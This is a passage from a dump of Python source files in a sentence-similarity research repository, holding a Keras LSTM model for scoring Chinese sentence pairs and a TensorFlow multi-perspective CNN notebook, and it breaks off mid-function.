0.83, 0.84, 0.85, 0.86, 0.87, 0.88, 0.89]\n # p = []\n # for thres in thresholds:\n # preds = [1 if p > thres else 0 for p in predicts]\n # preds = np.array(preds)\n # print(thres, sum(preds == labels))\n # p.append(sum(preds == labels))\n #\n # plt.plot(thresholds, p)\n # plt.title('各阈值下的准确率')\n # plt.ylabel('准确率 Accuracy')\n # plt.xlabel('阈值 Thresholds')\n # plt.show()\n # print(p)\n\n\nif __name__ == '__main__':\n start = time.time()\n for _ in range(1):\n main()\n print('run time: ', time.time()-start)" }, { "alpha_fraction": 0.6004503965377808, "alphanum_fraction": 0.6260673999786377, "avg_line_length": 35.24829864501953, "blob_id": "b3b7fe3db606f07fba7770dbe65f38869f6dd06c", "content_id": "7fb2dc652d64574fbbb0d88b17e2fd113a118d19", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11097, "license_type": "no_license", "max_line_length": 109, "num_lines": 294, "path": "/lstm/lstm.py", "repo_name": "eric-seekas/sentence_similarity", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\nimport os\nimport pickle\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nfrom gensim.models import Word2Vec\nfrom keras.callbacks import EarlyStopping, ModelCheckpoint\nfrom keras.layers import Dense, Input, LSTM, Embedding, Dropout\nfrom keras.layers.merge import concatenate\nfrom keras.layers.normalization import BatchNormalization\nfrom keras.models import Model, load_model\nfrom keras.preprocessing.sequence import pad_sequences\nfrom keras.preprocessing.text import Tokenizer\nfrom sklearn.metrics import roc_curve, auc\nimport json\nfrom gen_how_scores import how_scores, gen_scores\n\n\nEMBEDDING_FILE = '/media/jlan/E/Projects/nlp/sentence_similarity/dataset/w2v_model.bin'\nTRAIN_DATA_FILE = '/media/jlan/E/Projects/nlp/sentence_similarity/dataset/dataset.csv'\ntest_file = '/media/jlan/E/Projects/nlp/sentence_similarity/dataset/sim_qs_cut.json'\n\nMAX_SEQUENCE_LENGTH = 30\nMAX_NB_WORDS = 200000\nEMBEDDING_DIM = 
100\nVALIDATION_SPLIT = 0.1\nnum_lstm = 175\nnum_dense = 100\nrate_drop_lstm = 0.15\nrate_drop_dense = 0.15\nact = 'relu'\nre_weight = True # whether to re-weight classes to fit the 17.5% share in test set\nSTAMP = './model/w2v_sgd_b16'\nsave = True\nload_tokenizer = False\nsave_path = \"./model\"\ntokenizer_name = \"tokenizer.pkl\"\nembedding_matrix_path = \"./model/embedding_matrix.npy\"\n\n\ndef data_prepare(datafile):\n \"\"\"从文件中读取数据\"\"\"\n data = pd.read_csv(datafile)\n sentences1 = data['sentence1'].values\n sentences2 = data['sentence2'].values\n labels = data['similarity'].values\n return sentences1, sentences2, labels\n\n\ndef tokenize(sentences=None):\n \"\"\"获取所有文本中的词语\"\"\"\n if load_tokenizer:\n print('load tokenizer')\n tokenizer = pickle.load(open(os.path.join(save_path, tokenizer_name), 'rb'))\n else:\n tokenizer = Tokenizer(num_words=MAX_NB_WORDS, lower=False)\n tokenizer.fit_on_texts(sentences)\n if save:\n if not os.path.exists(save_path):\n os.makedirs(save_path)\n pickle.dump(tokenizer, open(os.path.join(save_path, tokenizer_name), \"wb\"))\n return tokenizer\n\n\ndef sent2seq(tokenizer, sentences):\n \"\"\"把句子转换成序列,如‘如何 来 防治 水稻 稻瘟病’----->[6, 383, 2, 1, 12]\"\"\"\n sequences = tokenizer.texts_to_sequences(sentences)\n sequences = pad_sequences(sequences, maxlen=MAX_SEQUENCE_LENGTH) # 维度统一为MAX_SEQUENCE_LENGTH,不足的补0\n return sequences\n\n\ndef w2v(tokenizer, nb_words):\n \"\"\"prepare embeddings\"\"\"\n print('Preparing embedding matrix')\n word2vec = Word2Vec.load(EMBEDDING_FILE)\n embedding_matrix = np.zeros((nb_words, EMBEDDING_DIM))\n for word, i in tokenizer.word_index.items():\n if word in word2vec.wv.vocab:\n embedding_matrix[i] = word2vec.wv.word_vec(word)\n else:\n print(word)\n print('Null word embeddings: %d' % np.sum(np.sum(embedding_matrix, axis=1) == 0))\n\n np.save(embedding_matrix_path, embedding_matrix)\n return embedding_matrix\n\n\ndef get_model(nb_words, embedding_matrix):\n \"\"\"定义模型结构\"\"\"\n embedding_layer = Embedding(nb_words,\n EMBEDDING_DIM,\n weights=[embedding_matrix],\n input_length=MAX_SEQUENCE_LENGTH,\n trainable=False)\n lstm_layer = LSTM(num_lstm, dropout=rate_drop_lstm, recurrent_dropout=rate_drop_lstm)\n\n sequence_1_input = Input(shape=(MAX_SEQUENCE_LENGTH,), dtype='int32')\n embedded_sequences_1 = embedding_layer(sequence_1_input)\n x1 = lstm_layer(embedded_sequences_1)\n\n sequence_2_input = Input(shape=(MAX_SEQUENCE_LENGTH,), dtype='int32')\n embedded_sequences_2 = embedding_layer(sequence_2_input)\n y1 = lstm_layer(embedded_sequences_2)\n\n merged = concatenate([x1, y1])\n merged = Dropout(rate_drop_dense)(merged)\n merged = BatchNormalization()(merged)\n\n merged = Dense(num_dense, activation=act)(merged)\n merged = Dropout(rate_drop_dense)(merged)\n merged = BatchNormalization()(merged)\n preds = Dense(1, activation='sigmoid')(merged)\n\n model = Model(inputs=[sequence_1_input, sequence_2_input],\n outputs=preds)\n model.compile(loss='binary_crossentropy',\n optimizer='sgd',\n metrics=['acc'])\n model.summary()\n return model\n\n\ndef train_model(model, seq1, seq2, labels):\n \"\"\"训练模型\"\"\"\n early_stopping = EarlyStopping(monitor='val_loss', patience=3)\n bst_model_path = STAMP + '.h5'\n model_checkpoint = ModelCheckpoint(bst_model_path, save_best_only=True, save_weights_only=False)\n\n hist = model.fit([seq1, seq2], labels,\n # validation_data=([test_seq1[:-100], test_seq2[:-100]], test_labels[:-100]),\n validation_split=0.2,\n epochs=100, batch_size=16, shuffle=True, callbacks=[model_checkpoint])\n\n 
model.load_weights(bst_model_path)\n bst_score = min(hist.history['loss'])\n bst_acc = max(hist.history['acc'])\n print(bst_acc, bst_score)\n print(\"Test score\", min(hist.history[\"val_loss\"]))\n print(\"Test acc\", max(hist.history[\"val_acc\"]))\n print(hist.history['val_loss'])\n print(hist.history['val_acc'])\n\n fig = plt.figure()\n x = range(1, len(hist.history['val_loss'])+1)\n ax1 = fig.add_subplot(111)\n lns1 = ax1.plot(x, hist.history['val_loss'], 'r-', label='损失曲线 Loss curve')\n ax2 = ax1.twinx()\n lns2 = ax2.plot(x, hist.history['val_acc'], '--', label='精度曲线 Accuracy curve')\n lns = lns1 + lns2\n labs = [l.get_label() for l in lns]\n ax1.set_ylabel('损失函数值 Loss function value')\n ax2.set_ylabel('精度 Accuracy')\n ax1.set_ylim(0, 1)\n ax2.set_ylim(0, 1)\n ax1.legend(lns, labs, loc=7)\n ax1.set_xlabel(\"训练轮数 Epochs\")\n plt.savefig('w2v_sgd_-1_b16.png')\n plt.show()\n\n\ndef test(model, test_sentences1, test_sentences2, test_seq1, test_seq2, test_labels):\n predicts = model.predict([test_seq1, test_seq2], batch_size=16, verbose=1)\n print(predicts)\n pres = np.array([1 if p[0]>0.5 else 0 for p in predicts])\n for i in range(len(test_labels)):\n print(\"t1: {}, t2: {}, score: {}, real_sim: {}\".\n format(test_sentences1[i], test_sentences2[i], predicts[i], test_labels[i])\n )\n print(sum(pres==test_labels))\n\n # 画roc曲线\n fpr_lstm, tpr_lstm, thresholds_lstm = roc_curve(test_labels, predicts)\n fpr_gen, tpr_gen, thresholds_gen = roc_curve(test_labels, gen_scores)\n fpr_how, tpr_how, thresholds_how = roc_curve(test_labels, how_scores)\n\n roc_auc_lstm = auc(fpr_lstm, tpr_lstm)\n roc_auc_gen = auc(fpr_gen, tpr_gen)\n roc_auc_how = auc(fpr_how, tpr_how)\n\n plt.plot(fpr_lstm, tpr_lstm, '-', label='本文模型 ROC曲线 ROC of this model')\n plt.plot(fpr_gen, tpr_gen, '-.', label='w2v_cosine ROC曲线 ROC of w2v_cosine')\n plt.plot(fpr_how, tpr_how, ':', label='HowNet ROC曲线 ROC of HowNet')\n\n plt.plot([0, 1], [0, 1], 'r--')\n plt.xlim([0, 1])\n plt.ylim([0, 1])\n plt.ylabel('真正率 True Positive Rate')\n plt.xlabel('假正率 False Positive Rate')\n plt.legend()\n plt.savefig('roc_auc.png')\n plt.show()\n\n # 画各阈值下的准确率曲线\n thresholds = [i / 100 for i in range(10, 90)]\n p = []\n for thres in thresholds:\n preds = [1 if p[0] > thres else 0 for p in predicts]\n preds = np.array(preds)\n print(thres, sum(preds == test_labels))\n p.append(sum(preds == test_labels))\n print(p)\n\n plt.plot(thresholds, p)\n plt.show()\n\n\ndef evaluate(model, test_seq1, test_seq2, test_labels):\n score = model.evaluate([test_seq1, test_seq2], test_labels, batch_size=10)\n print(score)\n\n\ndef sentence_most_similarity():\n # 计算一个问题与其它问题之间的相似度,找出与其最相似的问题\n data_dict = json.load(open(test_file, encoding='utf-8'))\n num_success = 0\n\n model = load_model('./model/w2v_sgd_b16.h5')\n\n global load_tokenizer\n load_tokenizer = True\n tokenizer = tokenize()\n\n for q in list(data_dict.keys()):\n qs = list(data_dict.keys())\n qs.remove(q)\n tests1 = np.array([q] * len(qs))\n tests2 = np.array(qs)\n test_seq1 = sent2seq(tokenizer, tests1)\n test_seq2 = sent2seq(tokenizer, tests2)\n\n predicts = model.predict([test_seq1, test_seq2], batch_size=16, verbose=1)\n max_inx = np.argmax(predicts, axis=0)[0]\n sort_inx = np.argsort(predicts, axis=0)[::-1]\n print(sort_inx)\n print(max_inx)\n # for i in range(len(tests1)):\n for i in sort_inx[:10]:\n print(\"t1: {}, t2: {}, score: {}\".\n format(tests1[i], tests2[i], predicts[i][0]))\n\n print('\\n' + tests1[max_inx] + ';' + tests2[max_inx] + ';', predicts[max_inx][0])\n\n most_similarity_sentence = 
tests2[max_inx]\n print('相似问题集:\\n', data_dict[q])\n print('预测结果:\\n', most_similarity_sentence)\n if most_similarity_sentence in data_dict[q]:\n print('预测正确')\n num_success += 1\n print('\\n')\n print(num_success)\n\n\ndef main():\n print('\\n从文件中读取数据..............................')\n sentences1, sentences2, labels = data_prepare(TRAIN_DATA_FILE)\n train_sentences1, train_sentences2, train_labels = sentences1[:-3207], sentences2[:-3207], labels[:-3207]\n test_sentences1, test_sentences2, test_labels = sentences1[-3207:], sentences2[-3207:], labels[-3207:]\n print('Found %s texts in train.csv' % len(sentences1))\n\n sentence_all = np.concatenate((sentences1, sentences2), axis=0)\n\n print('\\n获取所有文本中的词语..........................')\n tokenizer = tokenize(sentence_all)\n # print(tokenizer.word_index)\n # print([tokenizer.word_index[word] for word in ['如何', '来', '防治', '水稻', '稻瘟病']])\n nb_words = min(MAX_NB_WORDS, len(tokenizer.word_index)) + 1\n\n print('\\n把句子转换成序列, 并进行长度补全...............')\n train_seq1 = sent2seq(tokenizer, train_sentences1)\n train_seq2 = sent2seq(tokenizer, train_sentences2)\n test_seq1 = sent2seq(tokenizer, test_sentences1)\n test_seq2 = sent2seq(tokenizer, test_sentences2)\n\n # print('\\n计算每个词语的向量............................')\n # embedding_matrix = w2v(tokenizer, nb_words)\n # # embedding_matrix = np.ones((nb_words, EMBEDDING_DIM)) # bow模型\n #\n # print('\\n设计模型结构..................................')\n # model = get_model(nb_words, embedding_matrix)\n #\n # print('\\n训练模型.....................................')\n # train_model(model, train_seq1, train_seq2, train_labels)\n\n print('\\n测试模型.....................................')\n model = load_model('./model/w2v_sgd_b16.h5')\n test(model, test_sentences1, test_sentences2, test_seq1, test_seq2, test_labels)\n # evaluate(model, test_seq1, test_seq2, test_labels)\n\n\nif __name__ == '__main__':\n # main()\n sentence_most_similarity()\n" }, { "alpha_fraction": 0.5614489912986755, "alphanum_fraction": 0.5852677822113037, "avg_line_length": 34.80340576171875, "blob_id": "c1ec0463577dbc808141b21079a5e2831a8e38e6", "content_id": "5303c9c2bd9cd03f48eb698a0d9d713638f445ec", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 23133, "license_type": "permissive", "max_line_length": 151, "num_lines": 646, "path": "/mpcnn/notebook/mp_cnn_main_tensorflow_glove.py", "repo_name": "eric-seekas/sentence_similarity", "src_encoding": "UTF-8", "text": "\nimport nltk\nimport re\nfrom nltk import word_tokenize\nfrom keras.preprocessing.text import Tokenizer\nfrom keras.preprocessing.sequence import pad_sequences\nimport pandas as pd\nimport numpy as np\n\ndataset = pd.read_csv(\"../train.csv\",encoding = 'utf8')\n\n\n\nmaxlen = 30\ndim = 100\nrandom_state =100\n\ndef text_to_wordlist(text, remove_stopwords=False, stem_words=False):\n return text\n\ndataset['question1_n'] = dataset.question1.apply(lambda x :text_to_wordlist(x))\ndataset['question2_n'] = dataset.question2.apply(lambda x :text_to_wordlist(x))\n\ntokenizer = Tokenizer()\n\n\ntokenizer.fit_on_texts(dataset.question1_n.tolist() + dataset.question2_n.tolist())\n\ndataset['question1_seq']= tokenizer.texts_to_sequences(dataset.question1_n)\ndataset['question2_seq']= tokenizer.texts_to_sequences(dataset.question2_n)\n\n\n\nfrom sklearn.model_selection import train_test_split\ntrain_df, test_df = train_test_split(dataset, test_size=0.2, random_state= random_state)\ntest_df, val_df = train_test_split(test_df, test_size=0.5, 
random_state= random_state)\n\nfrom gensim.models import KeyedVectors\n\nnum_word = len(tokenizer.word_index)\nprint(num_word)\n\n\n\nfrom gensim.models import Word2Vec\nEMBEDDING_FILE = '/media/jlan/E/Projects/nlp/sentence_similarity/dataset/w2v_model.bin'\ndef w2v(tokenizer, nb_words):\n \"\"\"\n prepare embeddings\n :param tokenizer:\n :param nb_words:\n :return:\n \"\"\"\n print('Preparing embedding matrix')\n word2vec = Word2Vec.load(EMBEDDING_FILE)\n embedding_matrix = np.zeros((nb_words, dim))\n embedding_matrix = embedding_matrix.astype(np.float32)\n print(embedding_matrix.dtype)\n for word, i in tokenizer.word_index.items():\n if word in word2vec.wv.vocab:\n embedding_matrix[i] = word2vec.wv.word_vec(word)\n else:\n print(word)\n print('Null word embeddings: %d' % np.sum(np.sum(embedding_matrix, axis=1) == 0))\n return embedding_matrix\n\n# glove_dict = loadGloveModel(\"../../glove.6B/glove.6B.300d.txt\")\n\n\nembedding_matrix = w2v(tokenizer, num_word+1)\n\n\nimport tensorflow as tf\nimport time\nimport tensorflow.contrib.layers as layers\n\nmin_temp_result = None\n\ndef create_filter_blockA_weight(n_grams, w_dim, num_kernel):\n weight = tf.Variable(tf.random_normal((n_grams, w_dim, num_kernel),stddev=0.1),name='blockA_W')\n # weight = tf.Variable(tf.ones((n_grams, w_dim, num_kernel)))\n bias = tf.Variable(tf.zeros(num_kernel),name='blockA_b')\n return weight , bias\n\ndef create_filter_blockB_weight(n_grams, w_dim, num_kernel):\n weight = tf.Variable(tf.random_normal((n_grams, 1, 1, num_kernel), stddev=0.1),name='blockB_W')\n # weight = tf.Variable(tf.ones((n_grams, 1, 1, num_kernel)))\n bias = tf.Variable(tf.zeros(num_kernel),name='blockB_b')\n return weight,bias\n\n\ndef create_horizontal_conv(input,sequence_length, kernel_weight, type, min_mask):\n '''\n :param input: N x L x w_dim\n :param kernel_weight: [ window_size, 1, 1, number_kernel]\n :param type:\n :return: N x w_dim x num_kernel\n '''\n with tf.name_scope(\"horizontal_conv\"):\n i0 = tf.constant(0)\n num_kernel = int(kernel_weight[0].get_shape()[-1])\n # result = tf.zeros([0,w_dim, num_kernel])\n\n input = tf.expand_dims(input, 3)\n output = tf.nn.conv2d(input, kernel_weight[0], [1, 1, 1, 1], 'SAME') + kernel_weight[1] # N, height, width, out_kernel\n output = tf.nn.relu(output)\n if type == 'min':\n output = min_pool_operation2d(output,min_mask )\n elif type == 'mean':\n output = mean_pool_operation2d(output,sequence_length)\n elif type == 'max':\n output = tf.reduce_max(output, axis=1) # N, out_kernel\n else:\n raise Exception(\"no such type\")\n\n return output\n\n # result = tf.while_loop(_cond, _run_conv, loop_vars=[i0, result],shape_invariants=[i0.get_shape(), tf.TensorShape([None, w_dim, num_kernel])])\n # return result[1]\n\n\n\ndef create_vertical_conv(input, sequence_length, kernel_weight, type, min_mask):\n '''\n :param input:\n :param sequence_length:\n :param kernel_weight:\n :param type:\n :return: N, num_kernel\n '''\n # num_kernel = 3\n # filter = tf.Variable(tf.ones((2, 4, num_kernel)))\n with tf.name_scope(\"vertical_conv\"):\n num_kernel = int(kernel_weight[0].get_shape()[2])\n # print(input.dtype, kernel_weight[0].dtype)\n output = tf.nn.conv1d(input, kernel_weight[0], 1, 'SAME') + kernel_weight[1] # None, out_width , out_kernel\n output = tf.nn.relu(output)\n\n if type == 'min':\n output = min_pool_operation(output,min_mask )\n elif type == 'mean':\n output = mean_pool_operation(output,sequence_length)\n elif type == 'max':\n output = tf.reduce_max(output, axis=1) # N, out_kernel\n else:\n raise 
Exception(\"no such type\")\n return output\n\n\n\ndef create_direct_pool(input,num_kernel, type):\n '''\n :param input:\n :param num_kernel:\n :param type:\n :return: N, num_kernel\n '''\n if type == 'min':\n output = tf.tile(tf.expand_dims(tf.reduce_min(tf.reduce_min(input, axis=1), axis=1),axis=1),[1,num_kernel])\n elif type == 'mean':\n output = tf.tile(tf.expand_dims(tf.reduce_mean(tf.reduce_mean(input, axis=1), axis=1),axis=1),[1,num_kernel])\n elif type == 'max':\n output = tf.tile(tf.expand_dims(tf.reduce_max(tf.reduce_max(input, axis=1), axis=1),axis=1),[1,num_kernel])\n else:\n raise Exception(\"no such type\")\n return output\n\n\ndef l2distance(input1,input2):\n l2diff =tf.reduce_sum(tf.square(tf.subtract(input1, input2)),\n axis=1)\n l2diff = tf.clip_by_value(l2diff,0.1,1e7)\n l2diff = tf.sqrt(l2diff)\n return l2diff\n\n\ndef l1distance(input1,input2):\n l1diff = tf.square(tf.subtract(input1, input2))\n l1diff = tf.sqrt(tf.clip_by_value(l1diff,0.1,1e7))\n l1diff = tf.reduce_sum(l1diff, axis=1)\n return l1diff\n\ndef cosine_similarity(input1,input2):\n n_input1 = tf.nn.l2_normalize(input1, dim=1,epsilon=1e-7)\n n_input2 = tf.nn.l2_normalize(input2, dim=1,epsilon=1e-7)\n cosine_sim = tf.reduce_sum(tf.multiply(n_input1, n_input2), axis=1)\n return cosine_sim\n\n\ndef pairwise_distance1(input1, input2):\n '''\n :param input1: N, num_kernel, 1\n :param input2: N, num_kernel, 1\n :return:\n '''\n with tf.name_scope(\"pairwise_distance1\"):\n # return tf.stack([cosine_similarity(input1,input2),l2distance(input1,input2)],axis=1)\n return tf.concat([cosine_similarity(input1,input2),l2distance(input1,input2)],axis=1)\n\n\ndef pairwise_distance2(input1, input2):\n '''\n :param input1: N, num_kernel, 1\n :param input2: N, num_kernel, 1\n :return:\n '''\n with tf.name_scope(\"pairwise_distance2\"):\n # return tf.stack([cosine_similarity(input1,input2),l2distance(input1,input2)],axis=1)\n return tf.concat([cosine_similarity(input1,input2),l2distance(input1,input2)],axis=1)\n\n\ndef get_init_min_mask_value(input_sequence):\n value = np.zeros(shape=(input_sequence.shape[0],maxlen))\n for i, l in enumerate(input_sequence):\n value[i, l:] = 1e7\n return value\n\ndef min_pool_operation(tf_var, min_mask):\n '''\n :param tf_var:\n :param min_mark:\n :return:\n '''\n global min_temp_result\n min_mask = tf.expand_dims(min_mask,axis=2)\n # min_mask = tf.reshape(min_mask, (None,min_mask_mask.shape[0], tf_var.shape[2]))\n temp = tf.add(tf_var, tf.cast(min_mask,tf.float32))\n min_temp_result = temp\n return tf.reduce_min(temp, axis=1)\n\n\ndef mean_pool_operation(tf_var, input_sequence):\n '''\n :param tf_var:\n :param min_mark:\n :return:\n '''\n input_sequence = tf.reshape(input_sequence,[-1,1])\n temp = tf.divide(tf.reduce_sum(tf_var,axis=1), tf.add(tf.cast(input_sequence,tf.float32),1e-7))\n return temp\n\n\ndef min_pool_operation2d(tf_var, min_mask):\n '''\n :param tf_var:\n :param min_mark:\n :return:\n '''\n min_mask = tf.expand_dims(tf.expand_dims(min_mask,2),3)\n min_mask = tf.tile(min_mask,[1,1,int(tf_var.shape[2]),int(tf_var.shape[3])])\n # min_mask = tf.reshape(min_mask, (None,min_mask_mask.shape[0], tf_var.shape[2]))\n temp = tf.add(tf_var, tf.cast(min_mask,tf.float32))\n return tf.reduce_min(temp, axis=1)\n\n\ndef mean_pool_operation2d(tf_var, input_sequence):\n '''\n :param tf_var:\n :param min_mark:\n :return:\n '''\n input_sequence = tf.reshape(input_sequence,[-1,1,1])\n input_sequence = tf.tile(input_sequence,[1,int(tf_var.shape[2]),int(tf_var.shape[3])])\n temp = 
tf.divide(tf.reduce_sum(tf_var,axis=1), tf.add(tf.cast(input_sequence,tf.float32), 1e-7))\n return temp\n\n\nclass MPCNN:\n\n def __init__(self, maxlen, dim, embedding_weight):\n self.input = tf.placeholder(tf.int32,(None,maxlen),name='input1')\n self.input2 = tf.placeholder(tf.int32,(None,maxlen),name='input2')\n# self.input = tf.placeholder(tf.float32,(None,maxlen, dim),name='input1')\n# self.input2 = tf.placeholder(tf.float32,(None,maxlen, dim),name='input2')\n self.seq_length1 = tf.placeholder(tf.int32,(None),name='seq_len_1')\n self.seq_length2 = tf.placeholder(tf.int32,(None),name='seq_len_2')\n self.min_mask1 = tf.placeholder(tf.int32, (None, maxlen),name='min_mask1')\n self.min_mask2 = tf.placeholder(tf.int32, (None, maxlen),name='min_mask2')\n self.num_kernel_a = 32\n self.num_kernel_b = 32\n self.embedding_weight = tf.Variable(embedding_weight, name=\"E_W\")\n self.y = tf.placeholder(tf.int32, shape=(None,2),name='ans')\n\n input = tf.nn.embedding_lookup(self.embedding_weight, self.input)\n print('hhh', input.dtype)\n input2 = tf.nn.embedding_lookup(self.embedding_weight, self.input2)\n# input = self.input\n# input2 = self.input2\n \n num_kernel_a = self.num_kernel_a\n num_kernel_b = self.num_kernel_b\n seq_length1 = self.seq_length1\n seq_length2 = self.seq_length2\n min_mask1 = self.min_mask1\n min_mask2 = self.min_mask2\n y = self.y\n \n w_dim = dim\n \n n_grams_types = list(range(1,4)) + [-1]\n blockA_type= ['max','mean']\n blockA_weights = {}\n self.blockA_weights = blockA_weights\n regularizers = []\n for n_g in n_grams_types:\n for type in blockA_type:\n if n_g == - 1:\n continue\n t_w = create_filter_blockA_weight(n_g,w_dim, num_kernel_a)\n regularizers.append(tf.nn.l2_loss(t_w[0]))\n blockA_weights[(n_g,type)] = t_w\n\n \n blockA_convs = [{},{}]\n self.blockA_convs = blockA_convs\n for n_g in n_grams_types :\n for type in blockA_type:\n if n_g == -1 :\n blockA_convs[0][(n_g,type)] = create_direct_pool(input,num_kernel_a,type)\n blockA_convs[1][(n_g,type)] = create_direct_pool(input2,num_kernel_a,type)\n else:\n t_w = blockA_weights[(n_g,type)]\n print(input.dtype)\n blockA_convs[0][(n_g,type)] = create_vertical_conv(input,seq_length1,t_w,type, min_mask1)\n blockA_convs[1][(n_g,type)] = create_vertical_conv(input2,seq_length2,t_w,type, min_mask2)\n\n\n #---------- block B ------------------\n blockB_type= ['max','mean']\n blockB_weights = {}\n self.blockA_weights = blockA_weights\n for n_g in n_grams_types:\n for type in blockB_type:\n if n_g == - 1:\n continue\n t_w = create_filter_blockB_weight(n_g,w_dim, num_kernel_b)\n regularizers.append(tf.nn.l2_loss(t_w[0]))\n blockB_weights[(n_g,type)] = t_w\n\n\n blockB_convs = [{},{}]\n self.blockB_convs = blockB_convs\n for n_g in n_grams_types :\n for type in blockB_type:\n if n_g == -1 :\n continue\n else:\n t_w = blockB_weights[(n_g,type)]\n blockB_convs[0][(n_g,type)] = create_horizontal_conv(input,seq_length1,t_w,type,min_mask1)\n blockB_convs[1][(n_g,type)] = create_horizontal_conv(input2,seq_length2,t_w,type,min_mask2)\n\n\n \n outputs = []\n #------------vertical-----comparison -------------\n\n with tf.name_scope(\"vertical_comparison\"):\n vertical_gp1 = []\n vertical_gp2 = []\n for type in blockA_type:\n for n_g1 in n_grams_types:\n o1 = blockA_convs[0][(n_g1, type)]\n for n_g2 in n_grams_types:\n o2 = blockA_convs[1][(n_g2, type)]\n print(n_g1,n_g2, type)\n vertical_gp1.append(o1)\n vertical_gp2.append(o2)\n\n vertical_gp1 = tf.stack(vertical_gp1,axis=2)\n vertical_gp2 = tf.stack(vertical_gp2,axis=2)\n self.temp_gp1 
= vertical_gp1\n self.temp_gp2 = vertical_gp2\n o = pairwise_distance1(vertical_gp1, vertical_gp2)\n outputs.append(o)\n\n\n vertical_gp1 = []\n vertical_gp2 = []\n for n_g in n_grams_types:\n if n_g == -1:\n continue\n for type in blockB_type:\n vertical_gp1.append(blockB_convs[0][(n_g, type)])\n vertical_gp2.append(blockB_convs[1][(n_g, type)])\n \n vertical_gp1 = tf.concat(vertical_gp1,axis=2)\n vertical_gp2 = tf.concat(vertical_gp2,axis=2)\n self.temp_gp1 = vertical_gp1\n self.temp_gp2 = vertical_gp2\n o = pairwise_distance1(vertical_gp1, vertical_gp2)\n outputs.append(o)\n \n\n #-----------horizontal----comparison -------------------\n with tf.name_scope(\"horizontal_comparison\"):\n gp1 =[]\n gp2 =[]\n for type in blockA_type:\n # r1 = []\n # r2 = []\n for n_g1 in n_grams_types:\n gp1.append(blockA_convs[0][(n_g1, type)]) # N, num_kernel\n gp2.append(blockA_convs[1][(n_g1, type)]) # N, num_kernel\n \n gp1 = tf.reshape(tf.concat(gp1,axis=1),(-1,len(n_grams_types),num_kernel_a * len(blockA_type)))\n gp2 = tf.reshape(tf.concat(gp2,axis=1),(-1, len(n_grams_types), num_kernel_a * len(blockA_type)))\n o = pairwise_distance2(gp1, gp2)\n outputs.append(o) \n\n self.outputs = outputs\n concat_output = tf.concat(outputs,axis=1)\n self.concat_output = concat_output\n\n# fc_ol = layers.fully_connected(concat_output, 64)\n \n \n \n def create_fc_layer(num_node, prev_input):\n weight = tf.Variable(tf.truncated_normal([int(prev_input.shape[1]), num_node],stddev=0.1),name='fc_W')\n regularizers.append(tf.nn.l2_loss(weight))\n fc_biases_1 = tf.Variable(tf.zeros([num_node]),name='fc_b')\n output = tf.nn.elu(tf.matmul(prev_input,weight) + fc_biases_1)\n return output\n \n prob = tf.placeholder_with_default(1.0, shape=())\n self.prob = prob\n \n concat_output = tf.nn.dropout(concat_output, prob)\n fc_output = create_fc_layer(64, concat_output)\n concat_output = tf.nn.dropout(fc_output, prob)\n output = create_fc_layer(2, fc_output)\n \n \n self.output = output\n\n self.pred = tf.nn.softmax(output,dim=1)\n\n self.total_loss = tf.nn.softmax_cross_entropy_with_logits(labels=y, logits=output)\n self.loss = tf.reduce_mean(self.total_loss)\n total_l2_loss = tf.zeros(1)\n for r in regularizers:\n total_l2_loss += r\n self.loss += 1e-7 * total_l2_loss\n\n acc = tf.reduce_mean(tf.cast(tf.equal(tf.argmax(self.y, 1), tf.argmax(self.output, 1)), tf.float32))\n self.acc = acc\n self.optimizer = tf.train.AdamOptimizer().minimize(self.loss)\n \n self.sess = tf.Session()\n self.init = tf.global_variables_initializer()\n self.sess.run(self.init)\n \n\n\n\nmodel = MPCNN(maxlen,dim,embedding_matrix)\n\n\ndef get_feature_X(df, maxlen):\n x1 = []\n x2 = []\n l1 = []\n l2 = []\n for q1, q2 in zip(df.question1_seq.values, df.question2_seq.values):\n \n x1.append(q1)\n x2.append(q2)\n \n# x1.append([embedding_matrix[t] for t in q1])\n# x2.append([embedding_matrix[t] for t in q2])\n l1.append(len(q1))\n l2.append(len(q2))\n \n return pad_sequences(x1,maxlen,padding='post'), pad_sequences(x2,maxlen,padding='post'), np.array(l1),np.array(l2)\n\n\n\nimport sys\nimport os\nfrom ipywidgets import FloatProgress\nimport time\nfrom IPython.display import display\ndef evaluate (self, df, is_training, batch_size, sess, dropout_prob = 0.2):\n X = get_feature_X(df,maxlen)\n Y = pd.get_dummies(df.is_duplicate)\n sess = self.sess\n start_index = 0\n final_loss = 0\n final_acc = 0\n current_total_trained =0 \n p_bar = FloatProgress()\n display(p_bar)\n start_time = time.time()\n while start_index < X[0].shape[0]:\n temp_x1 = 
X[0][start_index:start_index+batch_size]\n temp_x2 = X[1][start_index:start_index+batch_size]\n temp_seq_len1 = X[2][start_index:start_index+batch_size]\n temp_seq_len2 = X[3][start_index:start_index+batch_size]\n test_y = Y[start_index:start_index+batch_size]\n\n feed_dict = {\n self.min_mask1: get_init_min_mask_value(temp_seq_len1),\n self.min_mask2: get_init_min_mask_value(temp_seq_len2),\n self.seq_length1: temp_seq_len1,\n self.seq_length2: temp_seq_len2,\n self.input: temp_x1,\n self.input2: temp_x2,\n self.y: test_y\n }\n \n if is_training:\n feed_dict[self.prob] = 1 - dropout_prob\n \n current_total_trained += temp_x1.shape[0]\n\n if is_training:\n # the exact output you're looking for:\n _, c, ac = sess.run([self.optimizer, self.loss, self.acc], feed_dict=feed_dict)\n final_loss += c * temp_x1.shape[0]\n final_acc += ac * temp_x1.shape[0]\n #print(\"%s/%s training loss %s\" % (start_index, X[0].shape[0], final_loss/current_total_trained))\n# sys.stdout.write(\"\\r%s/%s training loss %s\" % (start_index, X[0].shape[0], c))\n# sys.stdout.flush()\n duration = time.time() - start_time\n speed = duration/current_total_trained\n eta = (X[0].shape[0]-current_total_trained)*speed\n p_bar.value = current_total_trained/X[0].shape[0]\n p_bar.description = \"%s/%s, eta %s sec\"%(current_total_trained, X[0].shape[0], eta)\n else:\n c, ac, pred, real = sess.run([self.loss, self.acc, self.output, self.y], feed_dict=feed_dict)\n final_loss += c * temp_x1.shape[0]\n final_acc += ac * temp_x1.shape[0]\n # print('real:', real)\n # print('pred:', pred)\n print(sum(np.argmax(real, axis=1)==np.argmax(pred, axis=1)))\n start_index += batch_size\n \n final_loss = final_loss/X[0].shape[0]\n final_acc = final_acc/X[0].shape[0]\n return final_loss, final_acc\n\ndef gradients(self, df , batch_size, sess):\n X = 